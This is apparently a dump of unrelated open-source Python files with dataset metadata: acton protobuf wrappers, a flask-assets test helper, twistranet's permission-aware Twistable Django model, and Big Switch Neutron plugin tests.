len(self.proto.db.label_encoder.encoding) > 0: self.label_encoder = deserialise_encoder( self.proto.db.label_encoder) self.db_kwargs['label_encoder'] = self.label_encoder else: self.label_encoder = None self._set_default() @classmethod def deserialise(cls, proto: bytes, json: bool=False) -> 'LabelPool': """Deserialises a protobuf into a LabelPool. Parameters ---------- proto Serialised protobuf. json Whether the serialised protobuf is in JSON format. Returns ------- LabelPool """ if not json: lp = acton_pb.LabelPool() lp.ParseFromString(proto) return cls(lp) return cls(json_format.Parse(proto, acton_pb.LabelPool())) @property def DB(self) -> acton.database.Database: """Gets a database context manager for the specified database. Returns ------- type Database context manager. """ if hasattr(self, '_DB'): return self._DB self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name]( self.proto.db.path, **self.db_kwargs) return self._DB @property def ids(self) -> List[int]: """Gets a list of IDs. Returns ------- List[int] List of known IDs. """ if hasattr(self, '_ids'): return self._ids self._ids = list(self.proto.id) return self._ids @property def labels(self) -> numpy.ndarray: """Gets labels array specified in input. Notes ----- The returned array is cached by this object so future calls will not need to recompile the array. Returns ------- numpy.ndarray T x N x F NumPy array of labels. 
""" if hasattr(self, '_labels'): return self._labels ids = self.ids with self.DB() as db: return db.read_labels([0], ids) def _validate_proto(self): """Checks that the protobuf is valid and enforces constraints. Raises ------ ValueError """ validate_db(self.proto.db) def _set_default(self): """Adds default parameters to the protobuf.""" @classmethod def make( cls: type, ids: Iterable[int], db: acton.database.Database) -> 'LabelPool': """Constructs a LabelPool. Parameters ---------- ids Iterable of instance IDs. db Database Returns ------- LabelPool """ proto = acton_pb.LabelPool() # Store the IDs. for id_ in ids: proto.id.append(id_) # Store the database. proto.db.CopyFrom(db.to_proto()) return cls(proto) class Predictions(object): """Wrapper for the Predictions protobuf. Attributes ---------- proto : acton_pb.Predictions Protobuf representing predictions. db_kwargs : dict Dictionary of database keyword arguments. label_encoder : sklearn.preprocessing.LabelEncoder Encodes labels as integers. May be None. """ def __init__(self, proto: Union[str, acton_pb.Predictions]): """ Parameters ---------- proto Path to .proto file, or raw protobuf itself. """ try: self.proto = acton.proto.io.read_proto( proto, acton_pb.Predictions) except TypeError: if isinstance(proto, acton_pb.Predictions): self.proto = proto else: raise TypeError('proto should be str or Predictions protobuf.') self._validate_proto() self.db_kwargs = {kwa.key: json.loads(kwa.value) for kwa in self.proto.db.kwarg} if len(self.proto.db.label_encoder.encoding) > 0: self.label_encoder = deserialise_encoder( self.proto.db.label_encoder) self.db_kwargs['label_encoder'] = self.label_encoder else: self.label_encoder = None self._set_default() @property def DB(self) -> acton.database.Database: """Gets a database context manager for the specified database. Returns ------- type Database context manager. """ if hasattr(self, '_DB'): return self._DB self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name]( self.proto.db.path, **self.db_kwargs) return self._DB @property def predicted_ids(self) -> List[int]: """Gets a list of IDs corresponding to predictions. Returns ------- List[int] List of IDs corresponding to predictions. """ if hasattr(self, '_predicted_ids'): return self._predicted_ids self._predicted_ids = [prediction.id for prediction in self.proto.prediction] return self._predicted_ids @property def labelled_ids(self) -> List[int]: """Gets a list of IDs the predictor knew the label for. Returns ------- List[int] List of IDs the predictor knew the label for. """ if hasattr(self, '_labelled_ids'): return self._labelled_ids self._labelled_ids = list(self.proto.labelled_id) return self._labelled_ids @property def predictions(self) -> numpy.ndarray: """Gets predictions array specified in input. Notes ----- The returned array is cached by this object so future calls will not need to recompile the array. Returns ------- numpy.ndarray T x N x D NumPy array of predictions. """ if hasattr(self, '_predictions'): return self._predictions self._predictions = [] for prediction in self.proto.prediction: data = prediction.prediction shape = (self.proto.n_predictors, self.proto.n_prediction_dimensions) self._predictions.append( acton.proto.io.get_ndarray(data, shape, float)) self._predictions = numpy.array(self._predictions).transpose((1, 0, 2)) return self._predictions def _validate_proto(self): """Checks that the protobuf is valid and enforces constraints. 
Raises ------ ValueError """ if self.proto.n_predictors < 1: raise ValueError('Number of predictors must be > 0.') if self.proto.n_prediction_dimensions < 1: raise ValueError('Prediction dimension must be > 0.') validate_db(self.proto.db) def _set_default(self): """Adds default parameters to the protobuf.""" @classmethod def make( cls: type, predicted_ids: Iterable[int], labelled_ids: Iterable[int], predictions: numpy.ndarray, db: acton.database.Database, predictor: str='') -> 'Predictions': """Converts NumPy predictions to a Predictions object. Parameters ---------- predicted_ids Iterable of instance IDs corresponding to predictions. labelled_ids Iterable of instance IDs used to train the predictor. predictions T x N x D array of corresponding predictions. predictor Name of predictor used to generate predictions. db Database. Returns ------- Predictions """ proto = acton_pb.Predictions() # Store single data first. n_predictors, n_instances, n_prediction_dimensions = predictions.shape proto.n_predictors = n_predictors proto.n_prediction_dimensions = n_prediction_dimensions proto.predictor = predictor # Store the database. proto.db.CopyFrom(db.to_proto()) # Store the predictions array. We can do this by looping over the # instances. for id_, prediction in zip( predicted_ids, predictions.transpose((1, 0, 2))): prediction_ = proto.prediction.add() prediction_.id = int(id_) # numpy.int64 -> int prediction_.prediction.extend(prediction.ravel()) # Store the labelled IDs. for id_ in labelled_ids: # int() here takes numpy.int64 to int, for protobuf compatibility. proto.labelled_id.append(int(id_)) return cls(proto) @classmethod def deserialise(cls, proto: bytes, json: bool=False) -> 'Predictions': """Deserialises a protobuf into Predictions. Parameters ---------- proto Serialised protobuf. json Whether the serialised protobuf is in JSON format. Returns ------- Predictions """ if not json: predictions = acton_pb.Predictions() predictions.ParseFromString(proto) return cls(predictions) return cls(json_format.Parse(proto, acton_pb.Predictions())) class Recommendations(object): """Wrapper for the Recommendations protobuf. Attributes ---------- proto : acton_pb.Recommendations Protobuf representing recommendations. db_kwargs : dict Key-value pairs of keyword arguments for the database constructor. label_encoder : sklearn.preprocessing.LabelEncoder Encodes labels as integers. May be None. """ def __init__(self, proto: Union[str, acton_pb.Recommendations]): """ Parameters ---------- proto Path to .proto file, or raw protobuf itself. """ try: self.proto = acton.proto.io.read_proto( proto, acton_pb.Recommendations) except TypeError: if isinstance(proto, acton_pb.Recommendations): self.proto = proto else: raise TypeError( 'proto should be str or Recommendations protobuf.') self._validate_proto() self.db_kwargs = {kwa.key: json.loads(kwa.value) for kwa in self.proto.db.kwarg} if len(self.proto.db.label_encoder.encoding) > 0: self.label_encoder = deserialise_encoder( self.proto.db.label_encoder) self.db_kwargs['label_encoder'] = self.label_encoder else: self.label_encoder = None self._set_default() @classmethod def deserialise(cls, proto: bytes, json: bool=False) -> 'Recommendations': """Deserialises a protobuf into Recommendations. Parameters ---------- proto Serialised protobuf. json Whether the serialised protobuf is in JSON format. 
Returns ------- Recommendations """ if not json: recommendations = acton_pb.Recommendations() recommendations.ParseFromString(proto) return cls(recommendations) return cls(json_format.Parse(proto, acton_pb.Recommendations())) @property def DB(self) -> acton.database.Database: """Gets a database context manager for the specified database. Returns ------- type Database context manager. """ if hasattr(self, '_DB'): return self._DB self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name]( self.proto.db.path, **self.db_kwargs) return self._DB @property def recommendations(self) -> List[int]: """Gets a list of recommended IDs. Returns ------- List[int] List of recommended IDs. """ if hasattr(self, '_recommendations'): return self._recommendations self._recommendations = list(self.proto.recommended_id) return self._recommendations @property def labelled_ids(self) -> List[int]: """Gets a list of labelled IDs. Returns ------- List[int] List of labelled IDs. """ if hasattr(self, '_labelled_ids'): return self._labelled_ids self._labelled_ids = list(self.proto.labelled_id) return self._labelled_ids def _validate_proto(self): """Checks that the protobuf is valid and enforces constraints. Raises ------ ValueError """ validate_db(self.proto.db) def _set_default(self): """Adds default parameters to the protobuf.""" @classmethod def make( cls: type, recommended_ids: Iterable[int], labelled_ids: Iterable[int], recommender: str, db: acton.database.Database) -> 'Recommendations': """Constructs a Recommendations. Parameters ---------- recommended_ids Iterable of recommended instance IDs. labelled_ids Iterable of labelled instance IDs used to make recommendations. recommender Name of the recommender used to make recommendations. db Database. Returns ------- Recommendations """ proto = acton_pb.Recommendations() # Store single data first. proto.recommender = recommender # Store the IDs. for id_ in recommended_ids: proto.recommended_id.append(id_) for id_ in labelled_ids: proto.labelled_id.append(id_) # Store the database. proto.db.CopyFrom(db.to_proto()) return cls(proto)
bsd-3-clause
-1,972,909,586,038,859,800
27.202401
79
0.562827
false
4.518274
false
false
false
miracle2k/flask-assets
tests/helpers.py
1
1105
from flask.app import Flask from webassets.test import TempEnvironmentHelper as BaseTempEnvironmentHelper from flask_assets import Environment try: from flask import Blueprint Module = None except ImportError: # Blueprints only available starting with 0.7, # fall back to old Modules otherwise. Blueprint = None from flask import Module __all__ = ('TempEnvironmentHelper', 'Module', 'Blueprint') class TempEnvironmentHelper(BaseTempEnvironmentHelper): def _create_environment(self, **kwargs): if not hasattr(self, 'app'): self.app = Flask(__name__, static_folder=self.tempdir, **kwargs) self.env = Environment(self.app) return self.env try: from test.test_support import check_warnings except ImportError: # Python < 2.6 import contextlib @contextlib.contextmanager def check_warnings(*filters, **kwargs): # We cannot reasonably support this, we'd have to copy to much code. # (or write our own). Since this is only testing warnings output, # we might slide by ignoring it. yield
bsd-2-clause
1,334,822,051,698,322,400
28.078947
77
0.694118
false
4.316406
false
false
false
numericube/twistranet
twistranet/twistapp/models/twistable.py
1
31887
""" Base of the securable (ie. directly accessible through the web), translatable and full-featured TN object. A twist-able object in TN is an object which can be accessed safely from a view. Normally, everything a view manipulates must be taken from a TN object. Content, Accounts, MenuItems, ... are all Twistable objects. This abstract class provides a lot of little tricks to handle view/model articulation, such as the slug management, prepares translation management and so on. """ import re import inspect import logging import traceback from django.db import models from django.db.models import Q, loading from django.db.utils import DatabaseError from django.contrib.auth.models import User from django.core.exceptions import ValidationError, PermissionDenied, ObjectDoesNotExist from django.utils.safestring import mark_safe from twistranet.twistapp.lib.log import log from twistranet.twistapp.lib import roles, permissions from twistranet.twistapp.lib.slugify import slugify from twistranet.twistapp.signals import twistable_post_save from fields import ResourceField, PermissionField, TwistableSlugField class TwistableManager(models.Manager): """ It's the base of the security model!! """ # Disabled for performance reasons. # use_for_related_fields = True def get_query_set(self, __account__ = None, request = None, ): """ Return a queryset of 100%-authorized objects. All (should) have the can_list perm to True. This is in fact a kind of 'has_permission(can_list)' method! This method IS very slow. But you can speed things up if you pass either 'request' or '__account__' along the lines. Be aware, however, that in this case you loose the 'safety belt' provided by the security model. """ # Check for anonymous query import community, account, community __account__ = self._getAuthenticatedAccount(__account__, request) base_query_set = super(TwistableManager, self).get_query_set() # System account: return all objects without asking any question. And with all permissions set. if __account__.id == account.SystemAccount.SYSTEMACCOUNT_ID: return base_query_set # XXX TODO: Make a special query for admin members? Or at least mgrs of the global community? # XXX Make this more efficient? # XXX Or, better, check if current user is manager of the owner ? if __account__.id > 0: managed_accounts = [__account__.id, ] else: managed_accounts = [] # XXX This try/except is there so that things don't get stucked during boostrap try: if __account__.is_admin: return base_query_set.filter( _p_can_list__lte = roles.manager, ) except DatabaseError: log.warning("DB error while checking AdminCommunity. This is NORMAL during syncdb or bootstrap.") return base_query_set # Regular check. Works for anonymous as well... # network_ids = __account__.network_ids if not __account__.is_anonymous: qs = base_query_set.filter( Q( owner__id = __account__.id, _p_can_list = roles.owner, ) | Q( _access_network__targeted_network__target = __account__, _p_can_list = roles.network, ) | Q( _access_network__targeted_network__target = __account__, _p_can_list = roles.public, ) | Q( # Anonymous stuff _access_network__isnull = True, _p_can_list = roles.public, ) ) else: # Anon query. Easy: We just return public stuff. # Warning: nested query is surely inefficient... 
free_access_network = Twistable.objects.__booster__.filter( _access_network__isnull = True, _p_can_list = roles.public, ) qs = base_query_set.filter( Q( # Strictly anonymous stuff _access_network__isnull = True, _p_can_list = roles.public, ) | Q( # Incidently anonymous stuff (public stuff published by an anon account) _access_network__isnull = False, _access_network__id__in = free_access_network, _p_can_list = roles.public, ) ) return qs def getCurrentAccount(self, request): """ The official and hassle-free method of getting the currently auth account from a view. Just pass the request object. """ from account import Account, AnonymousAccount, UserAccount u = getattr(request, 'user', None) if isinstance(u, User): # We use this instead of the get_profile() method to avoid an infinite recursion here. # We mimic the _profile_cache behavior of django/contrib/auth/models.py to avoid doing a lot of requests on the same object if not hasattr(u, '_account_cache'): u._account_cache = UserAccount.objects.__booster__.get(user__id__exact = u.id) u._account_cache.user = u return u._account_cache # Didn't find anything. We must be anonymous. return AnonymousAccount() def _getAuthenticatedAccount(self, __account__ = None, request = None): """ Dig the stack to find the authenticated account object. Return either a (possibly generic) account object or None. Views with a "request" parameter magically works with that. If you want to use a system account, declare a '__account__' variable in your caller function. """ from account import Account, AnonymousAccount, UserAccount # If we have the __account__ object, then it's quite obvious here... if isinstance(__account__, Account): return __account__ # If we have the request object, then we just can use getCurrentAccount() instead if request: return self.getCurrentAccount(request) # We dig into the stack frame to find the request object. frame = inspect.currentframe() try: while frame: frame_members = dict(inspect.getmembers(frame)) # Inspect 'locals' variables to get the request or __account__ _locals = frame_members.get('f_locals', None) if _locals: # Check for an __acount__ variable holding a generic Account object. It always has precedence over 'request' if _locals.has_key('__account__') and isinstance(_locals['__account__'], Account): return _locals['__account__'] # Check for a request.user User object if _locals.has_key('request'): u = getattr(_locals['request'], 'user', None) if isinstance(u, User): # We use this instead of the get_profile() method to avoid an infinite recursion here. # We mimic the _profile_cache behavior of django/contrib/auth/models.py to avoid doing a lot of requests on the same object if not hasattr(u, '_account_cache'): u._account_cache = UserAccount.objects.__booster__.get(user__id__exact = u.id) u._account_cache.user = u return u._account_cache # Get back to the upper frame frame = frame_members.get('f_back', None) # Didn't find anything. We must be anonymous. return AnonymousAccount() finally: # Avoid circular refs frame = None stack = None del _locals # Backdoor for performance purposes. Use it at your own risk as it breaks security. @property def __booster__(self): return super(TwistableManager, self).get_query_set() @property def can_create(self,): auth = self._getAuthenticatedAccount() return not auth.is_anonymous class _AbstractTwistable(models.Model): """ We use this abstract class to enforce use of our manager in all our subclasses. 
""" objects = TwistableManager() class Meta: abstract = True class Twistable(_AbstractTwistable): """ Base (an abstract) type for rich, inheritable and securable TN objects. This class is quite optimal when using its base methods but you should always use your dereferenced class when you can do so! All Content and Account classes derive from this. XXX TODO: Securise the base manager! """ # Object management. Slug is optional (id is not ;)) slug = TwistableSlugField(unique = True, db_index = True, null = True, blank = True) # This is a way to de-reference the underlying model rapidly app_label = models.CharField(max_length = 64, db_index = True) model_name = models.CharField(max_length = 64, db_index = True) # Text representation of this content # Usually a twistable is represented that way: # (pict) TITLE # Description [Read more] # Basic metadata shared by all Twist objects. # Title is mandatory! title = models.CharField(max_length = 255, blank = True, default = '') description = models.TextField(max_length = 1024, blank = True, default = '') created_at = models.DateTimeField(auto_now_add = True, null = True, db_index = False) modified_at = models.DateTimeField(auto_now = True, null = True, db_index = True) created_by = models.ForeignKey("Account", related_name = "created_twistables", db_index = True, ) modified_by = models.ForeignKey("Account", null = True, related_name = "modified_twistables", db_index = True, ) # Picture management. # If None, will use the default_picture_resource_slug attribute. # If you want to get the account picture, use the 'picture' attribute. default_picture_resource_slug = None # XXX TODO PJ : the widget params are never rendered picture = ResourceField( media_type='image', null = True, blank = True, related_name = "picture_of") tags = models.ManyToManyField("Tag", related_name = "tagged") # These are two security flags. # The account this content is published for. 'NULL' means visible to AnonymousAccount. publisher = models.ForeignKey("Account", null = True, blank = True, related_name = "published_twistables", db_index = True, ) # Security / Role shortcuts. These are the ppl/account the Owner / Network are given to. # The account this object belongs to (ie. the actual author) owner = models.ForeignKey("Account", related_name = "by", db_index = True, ) # Our security model. permission_templates = () # Define this in your subclasses permissions = PermissionField(db_index = True) _access_network = models.ForeignKey("Account", null = True, blank = True, related_name = "+", db_index = True, ) # Scoring information. This is stored directly on the object for performance reasons. # Should be updated by BATCH, not necessarily 'live' (for perf reasons as well). static_score = models.IntegerField(default = 0) # The permissions. It's strongly forbidden to edit those roles by hand, use the 'permissions' property instead. 
_p_can_view = models.IntegerField(default = 16, db_index = True) _p_can_edit = models.IntegerField(default = 16, db_index = True) _p_can_list = models.IntegerField(default = 16, db_index = True) _p_can_list_members = models.IntegerField(default = 16, db_index = True) _p_can_publish = models.IntegerField(default = 16, db_index = True) _p_can_join = models.IntegerField(default = 16, db_index = True) _p_can_leave = models.IntegerField(default = 16, db_index = True) _p_can_create = models.IntegerField(default = 16, db_index = True) # Other configuration stuff (class-wise) _ALLOW_NO_PUBLISHER = False # Prohibit creation of an object of this class with publisher = None. _FORCE_SLUG_CREATION = True # Force creation of a slug if it doesn't exist @property def kind(self): """ Return the kind of object it is (as a lower-cased string). """ from twistranet.twistapp.models import Content, Account, Community, Resource from twistranet.tagging.models import Tag mc = self.model_class if issubclass(mc, Content): return 'content' elif issubclass(mc, Community): return 'community' elif issubclass(mc, Account): return 'account' elif issubclass(mc, Resource): return 'resource' elif issubclass(mc, Tag): return 'tag' raise NotImplementedError("Can't get twistable category for object %s" % self) @models.permalink def get_absolute_url(self): """ return object absolute_url """ category = self.kind viewbyslug = '%s_by_slug' % category viewbyid = '%s_by_id' % category if hasattr(self, 'slug'): if self.slug: return (viewbyslug, [self.slug]) return (viewbyid, [self.id]) @property def html_link(self,): """ Return a pretty HTML anchor tag """ d = { 'label': self.title_or_description, 'url': self.get_absolute_url(), } return u"""<a href="%(url)s" title="%(label)s">%(label)s</a>""" % d @property def forced_picture(self,): """ Return actual picture for this content or default picture if not available. May return None! XXX SHOULD CACHE THIS """ import resource if issubclass(self.model_class, resource.Resource): return self.object try: picture = self.picture if picture is None: raise resource.Resource.DoesNotExist() except resource.Resource.DoesNotExist: try: picture = resource.Resource.objects.get(slug = self.model_class.default_picture_resource_slug) except resource.Resource.DoesNotExist: return None return picture def get_thumbnail(self, *args, **kw): """ Same arguments as sorl's get_thumbnail method. """ from sorl.thumbnail import default try: return default.backend.get_thumbnail(self.forced_picture.image, *args, **kw) except: # in rare situations (CMJK + PNG mode, sorl thumbnail raise an error) import resource picture = resource.Resource.objects.get(slug = self.model_class.default_picture_resource_slug) return default.backend.get_thumbnail(picture.image, *args, **kw) @property def thumbnails(self,): """ Return a dict of standard thumbnails methods. XXX TODO: Cache this! And use lazy resolution! Some day resources will be able to have several DIFFERENT previews... Preview: Max = 500x500; Used when a large version should be available. 
Summary: Max = 100x100; Summary Preview: Max = Min = 100x100; Medium: Max = Min = 50x50; Icon: Max = Min = 16x16; """ return { "preview": self.get_thumbnail("500x500", crop = "", upscale = False), "summary": self.get_thumbnail("100x100", crop = "", upscale = False), "summary_preview": self.get_thumbnail("100x100", crop = "center top", upscale = True), "medium": self.get_thumbnail("50x50", crop = "center top", upscale = True), "big_icon": self.get_thumbnail("32x32", upscale = False), "icon": self.get_thumbnail("16x16", crop = "center top", upscale = True), } # # # Internal management, ensuring DB consistancy # # # def save(self, *args, **kw): """ Set various object attributes """ import account import community auth = Twistable.objects._getAuthenticatedAccount() # Check if we're saving a real object and not a generic Content one (which is prohibited). # This must be a programming error, then. if self.__class__.__name__ == Twistable.__name__: raise ValidationError("You cannot save a raw content object. Use a derived class instead.") # Set information used to retreive the actual subobject self.model_name = self._meta.object_name self.app_label = self._meta.app_label # Set owner, publisher upon object creation. Publisher is NEVER set as None by default. if self.id is None: # If self.owner is already set, ensure it's done by SystemAccount if self.owner_id: if not isinstance(auth, account.SystemAccount): raise PermissionDenied("You're not allowed to set the content owner by yourself.") else: self.owner = self.getDefaultOwner() if not self.publisher_id: self.publisher = self.getDefaultPublisher() else: if not self.publisher.can_publish: raise PermissionDenied("You're not allowed to publish on %s" % self.publisher) else: # XXX TODO: Check that nobody sets /unsets the owner or the publisher of an object # raise PermissionDenied("You're not allowed to set the content owner by yourself.") if not self.can_edit: raise PermissionDenied("You're not allowed to edit this content.") # Set created_by and modified_by fields if self.id is None: self.created_by = auth self.modified_by = auth # Check if publisher is set. Only GlobalCommunity may have its publisher to None to make a site visible on the internet. if not self.publisher_id: if not self.__class__._ALLOW_NO_PUBLISHER: raise ValueError("Only the Global Community can have no publisher, not %s" % self) # Set permissions; we will apply them last to ensure we have an id. # We also ensure that the right permissions are set on the right object if not self.permissions: perm_template = self.model_class.permission_templates if not perm_template: raise ValueError("permission_templates not defined on class %s" % self.__class__.__name__) self.permissions = perm_template.get_default() tpl = [ t for t in self.permission_templates.permissions() if t["id"] == self.permissions ] if not tpl: # Didn't find? We restore default setting. XXX Should log/alert something here! tpl = [ t for t in self.permission_templates.permissions() if t["id"] == self.model_class.permission_templates.get_default() ] log.warning("Restoring default permissions. 
Problem here.") log.warning("Unable to find %s permission template %s in %s" % (self, self.permissions, self.permission_templates.perm_dict)) if tpl[0].get("disabled_for_community") and issubclass(self.publisher.model_class, community.Community): raise ValueError("Invalid permission setting %s for this object (%s/%s)" % (tpl, self, self.title_or_description)) elif tpl[0].get("disabled_for_useraccount") and issubclass(self.publisher.model_class, account.UserAccount): raise ValueError("Invalid permission setting %s for this object (%s/%s)" % (tpl, self, self.title_or_description)) for perm, role in tpl[0].items(): if perm.startswith("can_"): if callable(role): role = role(self) setattr(self, "_p_%s" % perm, role) # Check if we're creating or not created = not self.id # Generate slug (or not !) if not self.slug and self.__class__._FORCE_SLUG_CREATION: if self.title: self.slug = slugify(self.title) elif self.description: self.slug = slugify(self.description) else: self.slug = slugify(self.model_name) self.slug = self.slug[:40] if created and self.__class__._FORCE_SLUG_CREATION: while Twistable.objects.__booster__.filter(slug = self.slug).exists(): match = re.search("_(?P<num>[0-9]+)$", self.slug) if match: root = self.slug[:match.start()] num = int(match.groupdict()['num']) + 1 else: root = self.slug num = 1 self.slug = "%s_%i" % (root, num, ) # Perform a full_clean on the model just to be sure it validates correctly self.full_clean() # Save and update access network information ret = super(Twistable, self).save(*args, **kw) self._update_access_network() # Send TN's post-save signal twistable_post_save.send(sender = self.__class__, instance = self, created = created) return ret def _update_access_network(self, ): """ Update hierarchy of driven objects. If save is False, won't save result (useful when save() is performed later). """ # No id => this twistable doesn't control anything, we pass. Value will be set AFTER saving. import account, community if not self.id: raise ValueError("Can't set _access_network before saving the object.") # Update current object. We save current access and determine the more restrictive _p_can_list access permission. # Remember that a published content has its permissions determined by its publisher's can_VIEW permission! _current_access_network = self._access_network obj = self.object if issubclass(obj.model_class, account.Account): _p_can_list = self._p_can_list else: _p_can_list = max(self._p_can_list, self.publisher and self.publisher._p_can_view or roles.public) # If restricted to content owner, no access network mentionned here. if _p_can_list in (roles.owner, ): self._access_network = None # XXX We have to double check this, esp. on the GlobalCommunity object. # Network role: same as current network for an account, same as publisher's network for a content elif _p_can_list == roles.network: if issubclass(obj.model_class, account.Account): self._access_network = obj else: self._access_network = self.publisher # Public content (or so it seems) elif _p_can_list == roles.public: # GlobalCommunity special case: if can_list goes public, then we can unrestrict the _access_network if issubclass(self.model_class, community.GlobalCommunity): self._access_network = None # Let's go public! else: # Regular treatment obj = obj.publisher while obj: if obj._p_can_list == roles.public: if obj == obj.publisher: # If an object is its own publisher (eg. GlobalCommunity), # we avoid infinite recursions here. 
break obj = obj.publisher elif obj._p_can_list in (roles.owner, roles.network, ): self._access_network = obj break else: raise ValueError("Unexpected can_list role found: %d on object %s" % (obj._p_can_list, obj)) else: raise ValueError("Unexpected can_list role found: %d on object %s" % (obj._p_can_list, obj)) # Update this object itself without calling the save() method again Twistable.objects.__booster__.filter(id = self.id).update(_access_network = self._access_network) # Update dependant objects if current object's network changed for public role Twistable.objects.__booster__.filter( Q(_access_network__id = self.id) | Q(publisher = self.id), _p_can_list = roles.public, ).exclude(id = self.id).update(_access_network = obj) # This is an additional check to ensure that no _access_network = None object with _p_can_list|_p_can_view = public still remains # glob = community.GlobalCommunity.get() # Twistable.objects.__booster__.filter( # _access_network__isnull = True, # _p_can_list = roles.public # ).update(_access_network = glob) def delete(self,): """ Here we avoid deleting related object for nullabled ForeignKeys. XXX This is bad 'cause if we use the Manager.delete() method, this won't get checked!!! XXX We need to migrate to Django 1.3 ASAP to get this issue solved with the on_delete attribute. Hack from http://djangosnippets.org/snippets/1231/ """ self.clear_nullable_related() super(Twistable, self).delete() def clear_nullable_related(self): """ Recursively clears any nullable foreign key fields on related objects. Django is hard-wired for cascading deletes, which is very dangerous for us. This simulates ON DELETE SET NULL behavior manually. """ # Update picture__id Twistable.objects.__booster__.filter(picture__id = self.id).update( picture = None ) @property def model_class(self): """ Return the actual model's class. This method issues no DB query. """ return loading.get_model(self.app_label, self.model_name) @property def object(self): """ Return the exact subclass this object belongs to. IT MAY ISSUE DB QUERY, so you should always consider using model_class instead if you can. This is quite complex actually: since we want like to minimize database overhead, we can't allow a "Model.objects.get(id = x)" call. So, instead, we walk through object inheritance to fetch the right attributes. XXX TODO: This is where I can implement the can_view or can_list filter. See search results to understand why. """ if self.id is None: raise RuntimeError("You can't get subclass until your object is saved in database.") # Get model class directly model = loading.get_model(self.app_label, self.model_name) if isinstance(self, model): return self return model.objects.__booster__.get(id = self.id) def __unicode__(self,): """ Return model_name: id (slug) """ if not self.app_label or not self.model_name: return "Unsaved %s" % self.__class__ if not self.id: return "Unsaved %s.%s" % (self.app_label, self.model_name, ) if self.slug: return "%s.%s: %s (%i)" % (self.app_label, self.model_name, self.slug, self.id) else: return "%s.%s: %i" % (self.app_label, self.model_name, self.id) @property def title_or_description(self): """ Return either title or description (or slug) but avoid the empty string at all means. The return value is considered HTML-safe. 
""" for attr in ('title', 'description', 'slug', 'id'): v = getattr(self, attr, None) if not v: continue if attr=='id': v = str(v) if not isinstance(v, unicode): v = unicode(v, errors = 'ignore') # important : to display description # we always use wiki filter which apply a "mark_safe" # but after a special treatment if attr!='description': return mark_safe(v) return v class Meta: app_label = 'twistapp' # # # Security Management # # # # XXX TODO: Use a more generic approach? And some caching as well? # # XXX Also, must check that permissions are valid for the given obj # # # def getDefaultOwner(self,): """ General case: owner is the auth account (or SystemAccount if not found?) """ return Twistable.objects._getAuthenticatedAccount() def getDefaultPublisher(self,): """ General case: publisher is the auth account (or SystemAccount if not found?) """ return Twistable.objects._getAuthenticatedAccount() @property def can_view(self): if not self.id: return True # Can always view an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_view, self) @property def can_delete(self): if not self.id: return True # Can always delete an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_delete, self) @property def can_edit(self): if not self.id: return True # Can always edit an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_edit, self) @property def can_publish(self): """ True if authenticated account can publish on the current account object """ if not self.id: return False # Can NEVER publish an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_publish, self) @property def can_list(self): """ Return true if the current account can list the current object. """ if not self.id: return True # Can always list an unsaved object auth = Twistable.objects._getAuthenticatedAccount() return auth.has_permission(permissions.can_list, self) # # # Views relations # # # @property def summary_view(self): return self.model_class.type_summary_view @property def detail_view(self): return self.model_class.type_detail_view
agpl-3.0
8,492,852,835,539,124,000
43.911268
151
0.581365
false
4.452248
false
false
false
beagles/neutron_hacking
neutron/tests/unit/bigswitch/test_restproxy_plugin.py
1
13331
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2012 Big Switch Networks, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. from contextlib import nested import mock from oslo.config import cfg import webob.exc from neutron import context from neutron.extensions import portbindings from neutron.manager import NeutronManager from neutron.tests.unit import _test_extension_portbindings as test_bindings from neutron.tests.unit.bigswitch import fake_server from neutron.tests.unit.bigswitch import test_base from neutron.tests.unit import test_api_v2 import neutron.tests.unit.test_db_plugin as test_plugin import neutron.tests.unit.test_extension_allowedaddresspairs as test_addr_pair patch = mock.patch class BigSwitchProxyPluginV2TestCase(test_base.BigSwitchTestBase, test_plugin.NeutronDbPluginV2TestCase): def setUp(self, plugin_name=None): self.setup_config_files() self.setup_patches() if plugin_name: self._plugin_name = plugin_name super(BigSwitchProxyPluginV2TestCase, self).setUp(self._plugin_name) self.port_create_status = 'BUILD' class TestBigSwitchProxyBasicGet(test_plugin.TestBasicGet, BigSwitchProxyPluginV2TestCase): pass class TestBigSwitchProxyV2HTTPResponse(test_plugin.TestV2HTTPResponse, BigSwitchProxyPluginV2TestCase): def test_failover_memory(self): # first request causes failover so next shouldn't hit bad server with self.network() as net: kwargs = {'tenant_id': 'ExceptOnBadServer'} with self.network(**kwargs) as net: req = self.new_show_request('networks', net['network']['id']) res = req.get_response(self.api) self.assertEqual(res.status_int, 200) class TestBigSwitchProxyPortsV2(test_plugin.TestPortsV2, BigSwitchProxyPluginV2TestCase, test_bindings.PortBindingsTestCase): VIF_TYPE = portbindings.VIF_TYPE_OVS HAS_PORT_FILTER = False def test_update_port_status_build(self): with self.port() as port: self.assertEqual(port['port']['status'], 'BUILD') self.assertEqual(self.port_create_status, 'BUILD') def _get_ports(self, netid): return self.deserialize('json', self._list_ports('json', netid=netid))['ports'] def test_rollback_for_port_create(self): plugin = NeutronManager.get_plugin() with self.subnet() as s: self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() kwargs = {'device_id': 'somedevid'} # allow thread spawns for this patch self.spawn_p.stop() with self.port(subnet=s, **kwargs): self.spawn_p.start() plugin.evpool.waitall() self.httpPatch.stop() ports = self._get_ports(s['subnet']['network_id']) #failure to create should result in port in error state self.assertEqual(ports[0]['status'], 'ERROR') def test_rollback_for_port_update(self): with self.network() as n: with self.port(network_id=n['network']['id'], device_id='66') as port: port = self._get_ports(n['network']['id'])[0] data = {'port': {'name': 'aNewName', 'device_id': '99'}} self.httpPatch = patch('httplib.HTTPConnection', 